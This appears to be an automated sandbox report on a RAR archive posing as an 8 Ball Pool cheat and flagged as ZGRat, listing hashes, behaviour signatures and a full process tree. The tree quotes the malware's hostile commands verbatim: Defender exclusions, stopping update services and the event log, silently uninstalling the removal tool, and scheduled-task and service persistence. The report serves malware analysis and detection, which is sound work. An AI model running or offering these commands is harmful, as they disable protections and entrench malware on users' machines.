Analysis
max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
submitted: 14-05-2024 09:44

Static task: static1
Behavioral task: behavioral1
  Sample: 8bp line cheto.rar
  Resource: win7-20240220-en
Behavioral task: behavioral2
  Sample: 8bp line cheto.rar
  Resource: win10v2004-20240508-en

General
Target: 8bp line cheto.rar
Size: 2.4MB
MD5: b56819fd25d445b1496395660c706dc0
SHA1: 787c59e095cb10589a8f6480a1f8ffee30c5cb8f
SHA256: da628a12427eaf7ade463bf0fa497a3153deed4aded462f3a58e93ba2288f35c
SHA512: c9b6f26fa00c314660341e43a1df32d2a67faff6fc3e00976a5231cb82afded4a88b4ee9dab9771ee3bbab27beb0b545caf2f2c2462ca928047b55a9c2df371a
SSDEEP: 49152:xUSIhr4gqAqn0Jj3GOdcdp7XTFbE3Y8QaToR/22rzlS4HLlH0JMYtm6b8l:xRIF4Sqn0blyjjF4PQ/2GzlfqJD78l
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
Processes:
resource | yara_rule
\Users\Admin\AppData\Roaming\8Serverdhcp.exe | family_zgrat_v1
\BridgeChainserverwinDriver\8Serverdhcp.exe | family_zgrat_v1
behavioral1/memory/1404-162-0x00000000008B0000-0x0000000000AB4000-memory.dmp | family_zgrat_v1
behavioral1/memory/2220-221-0x0000000000C80000-0x0000000000E84000-memory.dmp | family_zgrat_v1
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description (identical for every row): Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
pid | pid_target | process
1680 | 2160 | schtasks.exe
1908 | 2160 | schtasks.exe
3060 | 2160 | schtasks.exe
1460 | 2160 | schtasks.exe
2992 | 2160 | schtasks.exe
892 | 2160 | schtasks.exe
1564 | 2160 | schtasks.exe
1452 | 2160 | schtasks.exe
1644 | 2160 | schtasks.exe
2608 | 2160 | schtasks.exe
2752 | 2160 | schtasks.exe
3052 | 2160 | schtasks.exe
2224 | 2160 | schtasks.exe
2692 | 2160 | schtasks.exe
2244 | 2160 | schtasks.exe
Blocklisted process makes network request 3 IoCs
Processes:
flow | pid | process
5 | 2728 | powershell.exe
7 | 2728 | powershell.exe
9 | 2728 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
pid | process
2664 | powershell.exe
112 | powershell.exe
1744 | powershell.exe
2892 | powershell.exe
1540 | powershell.exe
1372 | powershell.exe
2800 | powershell.exe
2728 | powershell.exe
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
pid | process
2452 | 8bp_cheto.exe
1632 | 8_Ball_Pool_Cheto.exe
1008 | 8Serverdhcp.exe
3016 | conhost8.exe
676 | .conhost8.exe
1404 | 8Serverdhcp.exe
2220 | services.exe
480 | (no process name recorded)
2592 | VC_redist.x64.exe
Loads dropped DLL 8 IoCs
Processes:
pid | process
2728 | powershell.exe
2728 | powershell.exe
2728 | powershell.exe
3016 | conhost8.exe
3016 | conhost8.exe
1440 | cmd.exe
1440 | cmd.exe
480 | (no process name recorded)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | .conhost8.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | VC_redist.x64.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid | process
2452 | 8bp_cheto.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 2592 set thread context of 2492 | 2592 | VC_redist.x64.exe | conhost.exe
Drops file in Windows directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Windows\schemas\WCN\101b941d020240 | 8Serverdhcp.exe
File created | C:\Windows\wusa.lock | wusa.exe
File created | C:\Windows\wusa.lock | wusa.exe
File created | C:\Windows\schemas\WCN\lsm.exe | 8Serverdhcp.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
1896 | sc.exe
1944 | sc.exe
2072 | sc.exe
1488 | sc.exe
1524 | sc.exe
2092 | sc.exe
2460 | sc.exe
1512 | sc.exe
1568 | sc.exe
1576 | sc.exe
2564 | sc.exe
2320 | sc.exe
1728 | sc.exe
1748 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
1460 | schtasks.exe
1644 | schtasks.exe
2608 | schtasks.exe
2244 | schtasks.exe
1680 | schtasks.exe
1452 | schtasks.exe
3052 | schtasks.exe
1908 | schtasks.exe
3060 | schtasks.exe
892 | schtasks.exe
1564 | schtasks.exe
2752 | schtasks.exe
2224 | schtasks.exe
2992 | schtasks.exe
2692 | schtasks.exe
Modifies data under HKEY_USERS 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 702a0f78e3a5da01 | powershell.exe
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process (identical consecutive rows collapsed)
2672 | 7zFM.exe
2728 | powershell.exe (7 entries)
1632 | 8_Ball_Pool_Cheto.exe
2672 | 7zFM.exe (4 entries)
1404 | 8Serverdhcp.exe (all remaining entries; 64 IoCs in total)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
2672 | 7zFM.exe
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
description | pid | process
Token: SeRestorePrivilege | 2672 | 7zFM.exe
Token: 35 | 2672 | 7zFM.exe
Token: SeSecurityPrivilege | 2672 | 7zFM.exe
Token: SeDebugPrivilege | 2728 | powershell.exe
Token: SeDebugPrivilege | 1404 | 8Serverdhcp.exe
Token: SeDebugPrivilege | 1540 | powershell.exe
Token: SeDebugPrivilege | 1372 | powershell.exe
Token: SeDebugPrivilege | 112 | powershell.exe
Token: SeDebugPrivilege | 1744 | powershell.exe
Token: SeDebugPrivilege | 2892 | powershell.exe
Token: SeDebugPrivilege | 2220 | services.exe
Token: SeDebugPrivilege | 2800 | powershell.exe
Token: SeShutdownPrivilege | 2920 | powercfg.exe
Token: SeShutdownPrivilege | 2924 | powercfg.exe
Token: SeShutdownPrivilege | 1500 | powercfg.exe
Token: SeShutdownPrivilege | 2764 | powercfg.exe
Token: SeDebugPrivilege | 2664 | powershell.exe
Token: SeShutdownPrivilege | 1636 | powercfg.exe
Token: SeShutdownPrivilege | 1952 | powercfg.exe
Token: SeShutdownPrivilege | 848 | powercfg.exe
Token: SeShutdownPrivilege | 2544 | powercfg.exe
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid | process
2672 | 7zFM.exe
2672 | 7zFM.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
2452 | 8bp_cheto.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Each row reads "PID <pid> wrote to memory of <target pid>"; identical rows are collapsed and the last column gives how many times the row appeared (64 entries in total).
pid | process | target pid | target process | entries
1640 | cmd.exe | 2672 | 7zFM.exe | 3
2672 | 7zFM.exe | 2452 | 8bp_cheto.exe | 4
2452 | 8bp_cheto.exe | 2728 | powershell.exe | 4
2728 | powershell.exe | 1632 | 8_Ball_Pool_Cheto.exe | 4
2728 | powershell.exe | 1008 | 8Serverdhcp.exe | 4
2728 | powershell.exe | 3016 | conhost8.exe | 4
1008 | 8Serverdhcp.exe | 1984 | WScript.exe | 4
3016 | conhost8.exe | 676 | .conhost8.exe | 4
1984 | WScript.exe | 1440 | cmd.exe | 4
1440 | cmd.exe | 1404 | 8Serverdhcp.exe | 4
1404 | 8Serverdhcp.exe | 112 | powershell.exe | 3
1404 | 8Serverdhcp.exe | 1744 | powershell.exe | 3
1404 | 8Serverdhcp.exe | 2892 | powershell.exe | 3
1404 | 8Serverdhcp.exe | 1540 | powershell.exe | 3
1404 | 8Serverdhcp.exe | 1372 | powershell.exe | 3
1404 | 8Serverdhcp.exe | 2392 | cmd.exe | 3
2392 | cmd.exe | 1896 | chcp.com | 3
2392 | cmd.exe | 2352 | PING.EXE | 3
2392 | cmd.exe | 2220 | services.exe | 1
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
The number in brackets is the process depth in the tree; the line under each image path is the command line as recorded, followed by the signatures that matched the process.

[1] C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\8bp line cheto.rar"
    - Suspicious use of WriteProcessMemory
  [2] C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\8bp line cheto.rar"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zO07A70E46\8bp_cheto.exe
        "C:\Users\Admin\AppData\Local\Temp\7zO07A70E46\8bp_cheto.exe"
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Roaming\8_Ball_Pool_Cheto.exe
            "C:\Users\Admin\AppData\Roaming\8_Ball_Pool_Cheto.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Users\Admin\AppData\Roaming\8Serverdhcp.exe
            "C:\Users\Admin\AppData\Roaming\8Serverdhcp.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\BridgeChainserverwinDriver\s6qD0S6dHcOUHMjR5EUKU.vbe"
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\BridgeChainserverwinDriver\csem9dbN8vZV.bat" "
                - Loads dropped DLL
                - Suspicious use of WriteProcessMemory
              [8] C:\BridgeChainserverwinDriver\8Serverdhcp.exe
                  "C:\BridgeChainserverwinDriver/8Serverdhcp.exe"
                  - Executes dropped EXE
                  - Drops file in Windows directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\services.exe'
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious use of AdjustPrivilegeToken
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious use of AdjustPrivilegeToken
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\schemas\WCN\lsm.exe'
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious use of AdjustPrivilegeToken
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\winlogon.exe'
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious use of AdjustPrivilegeToken
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious use of AdjustPrivilegeToken
                [9] C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DU95VhgWai.bat"
                    - Suspicious use of WriteProcessMemory
                  [10] C:\Windows\system32\chcp.com
                       chcp 65001
                  [10] C:\Windows\system32\PING.EXE
                       ping -n 10 localhost
                       - Runs ping.exe
                  [10] C:\Users\Default User\services.exe
                       "C:\Users\Default User\services.exe"
                       - Executes dropped EXE
                       - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Roaming\conhost8.exe
            "C:\Users\Admin\AppData\Roaming\conhost8.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Roaming\.conhost8.exe
              "C:\Users\Admin\AppData\Roaming\.conhost8.exe"
              - Executes dropped EXE
              - Drops file in System32 directory
            [7] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                - Command and Scripting Interpreter: PowerShell
                - Drops file in System32 directory
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              [8] C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  - Drops file in Windows directory
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop UsoSvc
                - Launches sc.exe
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                - Launches sc.exe
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop wuauserv
                - Launches sc.exe
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop bits
                - Launches sc.exe
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop dosvc
                - Launches sc.exe
            [7] C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe delete "driverupdate"
                - Launches sc.exe
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                - Launches sc.exe
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop eventlog
                - Launches sc.exe
            [7] C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe start "driverupdate"
                - Launches sc.exe

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\services.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\System.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Windows\schemas\WCN\lsm.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\schemas\WCN\lsm.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\Windows\schemas\WCN\lsm.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\BridgeChainserverwinDriver\winlogon.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\ProgramData\VC_redist.x64.exe
    C:\ProgramData\VC_redist.x64.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
  [2] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    [3] C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        - Drops file in Windows directory
  [2] C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      - Launches sc.exe
  [2] C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      - Launches sc.exe
  [2] C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      - Launches sc.exe
  [2] C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      - Launches sc.exe
  [2] C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      - Launches sc.exe
  [2] C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\conhost.exe
      C:\Windows\system32\conhost.exe
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- System Services (2)
  - Service Execution (2)
- Scheduled Task/Job (1)
Persistence
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
Downloads